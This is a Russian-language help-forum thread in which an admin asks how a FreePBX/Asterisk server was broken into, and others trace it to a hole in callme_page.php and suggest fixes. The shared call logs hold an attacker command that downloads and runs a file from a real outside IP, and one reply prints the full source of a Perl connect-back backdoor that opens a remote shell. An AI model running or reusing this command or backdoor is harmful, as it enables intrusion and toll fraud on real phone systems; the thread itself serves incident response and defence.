Пожалуйста, войдите здесь. Часто задаваемые вопросы О нас
Задайте Ваш вопрос

взлом астриск

1

вломали пару атс. версия астериска 1.8.7.0

в логах cdr вот такая фигня.

system (echo Fucked> /var/www/html/recordings/misc/x )

внимаение вопрос. как запустили команду system?

вот другой пример

рекомендую всем проверить сдр на предмет lastapp='system'. ибо в нормальной фрипбкс такого нету. mysql> select * from asteriskcdrdb.cdr where lastapp='system' -> ; +---------------------+------+-----+-----+---------------+--------------------------------+------------+---------+-----------------------------------------------------------------------+----------+---------+-------------+----------+-------------+------------------+-----------+ | calldate | clid | src | dst | dcontext | channel | dstchannel | lastapp | lastdata | duration | billsec | disposition | amaflags | accountcode | uniqueid | userfield | +---------------------+------+-----+-----+---------------+--------------------------------+------------+---------+-----------------------------------------------------------------------+----------+---------+-------------+----------+-------------+------------------+-----------+ | 2012-04-06 02:20:11 | | | 98 | from-internal | Local/98@from-internal-a155;1 | | System | wget http://80.68.94.143/dc -O /tmp/dc;perl /tmp/dc 80.68.94.143 3000 | 0 | 0 | ANSWERED | 3 | | 1333664411.20963 | | | 2012-04-07 23:31:34 | | | 98 | from-internal | Local/98@from-internal-1655;1 | | System | wget http://80.68.94.143/dc -O /tmp/dc;perl /tmp/dc 80.68.94.143 3000 | 1 | 1 | ANSWERED | 3 | | 1333827094.22524 | | +---------------------+------+-----+-----+---------------+--------------------------------+------------+---------+-----------------------------------------------------------------------+----------+---------+-------------+----------+-------------+------------------+-----------+ 2 rows in set (0.01 sec)

самое интересно что нет src вообще

удалить закрыть спам изменить тег редактировать

спросил 2012-04-08 11:43:44 +0400

meral Gravatar meral flag of Ukraine
21228 23 18 169
http://pro-sip.net/

обновил 2012-04-08 13:01:55 +0400

Comments

А в логах-то что???

switch ( 2012-04-08 13:32:20 +0400 )редактировать

да в том то и дело что ничего особенного. ну после взлома слив ттрафика на платные номера.

meral ( 2012-04-08 13:48:55 +0400 )редактировать

Сервер смотрел наружу сетевым интерфейсом?

switch ( 2012-04-08 14:04:08 +0400 )редактировать

эпический вопрос, в духе: а сервер был включен в розетку?

um2010 ( 2012-04-08 20:30:20 +0400 )редактировать

сервер был сам снаружи.

meral ( 2012-04-08 20:36:06 +0400 )редактировать

9 Ответов

2

Запустили через /var/www/html/recordings/misc/callme_page.php .

Так что закрывайте доступ к этой директории.

sed -i 's/\(<?php\)/\1\nexit;/' /var/www/html/recordings/misc/callme_page.php
echo -e "Order allow,deny \nDeny from all" >> /var/www/html/recordings/.htaccess
ссылка удалить спам редактировать

ответил 2012-04-08 14:40:57 +0400

zzuz Gravatar zzuz flag of Russian Federation
6744 2 6 69
http://line24.ru/

обновил 2012-04-08 14:45:32 +0400

Comments

так там же авторизация. не могу закрытьэто основное свойства данной пары.

meral ( 2012-04-08 20:37:20 +0400 )редактировать

Тогда достаточно callme_page.php убрать .

zzuz ( 2012-04-08 21:01:20 +0400 )редактировать

переработать скрипт, усилить всю безопасность, ограничить ойпишнеки

um2010 ( 2012-04-08 21:20:30 +0400 )редактировать

ну пока поменял путь к этой директории и убрал апач поставил nginx через https с доступом только к конкретной диерктории.

meral ( 2012-04-08 21:50:05 +0400 )редактировать
1

а может не стоит выставлять в дикий нет, столько потенциально дырявого софта? делайте простенькие sbc, где доступны 3-4 порта (Os+asterisk\freeswith+fail2ban или pfsense+freeswitch)..

ссылка удалить спам редактировать

ответил 2012-04-09 16:09:07 +0400

svoy Gravatar svoy
1603 1 4 20
http://svoy.in.ua/

Comments

это был риторический вопрос? freeswitch я бы вообще в нет не выставлял.

meral ( 2012-04-10 14:23:42 +0400 )редактировать

это ценный совет и походу самый действенный, если даже ты не уберегся от ломателей...

svoy ( 2012-04-10 14:42:24 +0400 )редактировать

гы. порсто нет смысла тратить время на защиту от взлома на впсках по 20 евро в месяц. и я какбы не специалист по безопасности.

meral ( 2012-04-11 09:36:46 +0400 )редактировать

но претензии ведь к тебе будут, что не предостерег от глупого выбора заказчика ;) сливают ведь не на 20 евро..

svoy ( 2012-04-11 10:24:25 +0400 )редактировать

на 150 слили. 150 мое время по переустановке.

meral ( 2012-04-11 11:16:37 +0400 )редактировать
1

http://seclists.org/fulldisclosure/2012/Mar/234

Уязвимость найдена в FrePBX версий 2.6-2.10

http://www.freepbx.org/trac/ticket/5711

ссылка удалить спам редактировать

ответил 2012-04-09 11:04:51 +0400

Olpag Gravatar Olpag
1884 3 4 29

обновил 2012-04-09 12:02:17 +0400

Comments

Спасибо , КЭП.

zzuz ( 2012-04-09 13:07:28 +0400 )редактировать
1

Че-то тоскливо как-то становится, вторая уязвимость за месяц, позволяющая утащить все. Месяц назад выплыл баг в vTiger http://elastix.org/index.php/en/component/kunena/116-security/98468-vtiger-vulnerability.html.

Имхо, для всех коробок, хоть как-то смотрящих в инет надо в .htaccess добавлять что-то вроде:

AuthUserFile /var/www/.htpasswd
AuthType Basic 
AuthName "Enter login and password" 
Require valid-user
Order deny,allow
Deny from all
Allow from <trusted IP's>
Satisfy Any

иначе заклюют...

ссылка удалить спам редактировать

ответил 2012-04-09 15:37:01 +0400

lash Gravatar lash
167 7 2 10
0

Возможно через Manager.

Покажите

netstat -nltup|grep asterisk
ссылка удалить спам редактировать

ответил 2012-04-08 12:18:47 +0400

ro Gravatar ro flag of Russian Federation
404 1 1 11
http://rootblog.ru/

Comments

менеджер только на локалхост открыт. или в нем уязвимость есть?

meral ( 2012-04-08 12:35:33 +0400 )редактировать

Не понял ответа сначала. Если только на локалхост, то уже неважно, есть уязвимости в самом менеджере или нет.

ro ( 2012-04-08 14:28:19 +0400 )редактировать
0

АТС как то связаны между собой?

ссылка удалить спам редактировать

ответил 2012-04-08 12:10:37 +0400

Злобный Мыш Gravatar Злобный Мыш
292 13 3 16

Comments

да. в одной подсети находятся.больше ничего.

meral ( 2012-04-08 12:37:06 +0400 )редактировать
0

Троянчик worsyn скачивает такую херь:

#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";

собственно после чего, он может сделать всё что хошь.. такой радмин получается

залазим, к примеу, так: http://www.chovy.com/personal/simiens-crew-2005-how-they-did-it/

ссылка удалить спам редактировать

ответил 2012-04-08 13:23:32 +0400

um2010 Gravatar um2010
2056 69 11 52

обновил 2012-04-08 13:33:46 +0400

Comments

да троянчика я прочитал уже. меня интересует что мне сделать чтоб эту дырку закрыть.а именно КАК они его вызвали то.

meral ( 2012-04-08 13:47:35 +0400 )редактировать

Выше ответ. ломают повально через Recordings .Скачивают бекдор запускают и проксиуют трафик. всё просто.

zzuz ( 2012-04-08 14:44:33 +0400 )редактировать

Меня, на этой католическо-пасхальной неделе, fail2ban заваливает письмами о попытках перебора аккаунтов. Всегда на праздниках оживляются совлочи,....

alphil ( 2012-04-08 20:04:25 +0400 )редактировать
0

А полнее то строчка сдр какая? И нет ли на серваке wordpress ?

ссылка удалить спам редактировать

ответил 2012-04-08 12:32:59 +0400

um2010 Gravatar um2010
2056 69 11 52

Comments

нет.чистый астериск и фрипбкс. полная строчка странная. похоже на запуск call-скриптом.

meral ( 2012-04-08 12:35:18 +0400 )редактировать

это worsyn троян, лезет через уязвимости httpб не исключено, что через морду freepbx

um2010 ( 2012-04-08 13:20:24 +0400 )редактировать

http://www.chovy.com/personal/simiens-crew-2005-how-they-did-it/ а вот и инструкция-пример как влезть

um2010 ( 2012-04-08 13:32:39 +0400 )редактировать
-1

Вот рассказывал мне кто-то не так давно про разные системы обнаружения вторжений и fail2ban-ы... Если внешние коннекты к АТСке идут со статики - то я режу айпишники фаерволом, если таких много и откуда угодно - то ВПН и не морочить яйца. Есессно защиту от перебора паролей ВПНа никто не отменял, но так никто не увидит что у вас сип наружу торчит

ссылка удалить спам редактировать

ответил 2012-04-12 18:01:13 +0400

asdev Gravatar asdev flag of Ukraine
244 21 5 15

Comments

1

Прям КЭП.. Спасибо!

zzuz ( 2012-04-12 18:32:25 +0400 )редактировать

ну так ты крут. только вот чето мои клиенты не хотят так. не знаешь чего? и никто ничего не перебирал. просто взяли и в одно действие взломали.

meral ( 2012-04-12 18:56:06 +0400 )редактировать

Там такой же админ прошаренный сидел , фильтровал всё по портам)

zzuz ( 2012-04-12 19:02:49 +0400 )редактировать

А не пробовали объяснять что вываливание порта наружу чревато потерей бабок? Видимо поломали не в 1 действие, просто просканили грамотно. Клиент того же ППТП ВПН есть практически в любой системе, и айфонах, и на винде, и на линухах, везде. Настроить сервер пптп - 5 минут. Порезать айпишники - тоже несложно. А различные системы обнаружения спасают разве что в случае публичных веб и фтп серверов, когда пользователей огромное кол-во и они не авторизовываются. А вываливать порт астериски наружу и надеяться на то что атаку обнаружат - это как бороться с поносом, ограничивая доступ в сортир. Целенаправленный взлом в этом случае - вопрос времени. А если у вас ещё и веб-морда торчит наружу, то очень недолгого времени

asdev ( 2012-04-13 09:06:37 +0400 )редактировать

чукча писатель? прочитай вот написано как поломали. в логах http сервера нет никаких подборов. у меня имеенно публичная сервер. еще и не мой а клиента. а еще у клиента КОРОБОЧКИ на динамических адресах. какое нафиг pptp? вообще возникакет впечатление что вы нкиогда с частными клиентами не работали.

meral ( 2012-04-13 11:53:48 +0400 )редактировать

Я писал про возможность подбора впн паролей. А просканить диапазон айпишников на предмет наличия какого-то дырявого пхп файла - нех делать, вы и не заметите этого, т.к. это и не скан вовсе, если сервер публичный и к веб-морде имеют доступ много народа. Коробочки на динамических адресах имеют прямой доступ в инет? Установка между коробочкой и каналом инета любого роутера за 20-30 уе уже позволит поднять впн канал, кроме того, многие коробочки умеют ПППоЕ, сервер которого тоже можно поднять. Если сервер публичный - что там ещё крутится? Или астериск у вас - публичный? С доступом всем?

asdev ( 2012-04-13 12:07:04 +0400 )редактировать

нет.ну точно маленький.коробочка 30 баксиков.давайте перед нет еще на 30 поставим роутер. коробочки дома у сотрудников. какой может быть там pppoe? и да, представте у коробочек ДИНАМИЧЕСКИЕ адреса. и мне они НЕИзВЕСТНЫ заранее.

meral ( 2012-04-13 15:09:12 +0400 )редактировать

все. больше не отвечают. астериск не является корпоративным свичем.он вот как раз на частников расчитан которые ничего за "всего 30 уе" усложняющего установку "всего на полчаса работы админа" ставить не будут.

meral ( 2012-04-13 15:10:50 +0400 )редактировать

А что за коробочки? Модели есть? В случае ВПН подключения пофигу какие у коробочек адреса, т.к. им назначаются адреса ВПН сети и сам сервер маршрутизирует на них траффик. Грубо говоря, если у вас на телефоне есть сип-звонилка и впн клиент, вы поехали в другую страну, подключились в ближайшем макдаке к вайфаю, и к впн серверу - у вас будет внутренний статический айпишник впн сети, который выдаётся сервером по вашему логину/паролю

asdev ( 2012-04-13 16:14:14 +0400 )редактировать

мда. похоже я идиот. без коментариев.

meral ( 2012-04-13 18:08:30 +0400 )редактировать

Да нормуль. Не парься . Это обычный тролль. Из тех кто постоянно философствует , а потом пишет на форумах "не могу зарегестрировать транк от Манго офиса...".

zzuz ( 2012-04-13 18:32:34 +0400 )редактировать

Ваш ответ

Please start posting your answer anonymously - your answer will be saved within the current session and published after you log in or create a new account. Please try to give a substantial answer, for discussions, please use comments and please do remember to vote (after you log in)!
[скрыть предварительный просмотр]

Закладки и информация

Добавить закладку
2 закладки

подписаться на rss ленту новостей

Статистика

Задан: 2012-04-08 11:43:44 +0400

Просмотрен: 2,437 раз

Обновлен: Apr 12 '12

Проект компании "АТС Дизайн"
Asterisk® и Digium® являются зарегистрированными торговыми марками компании Digium, Inc., США.
IP АТС Asterisk распространяется под лицензией GNU GPL.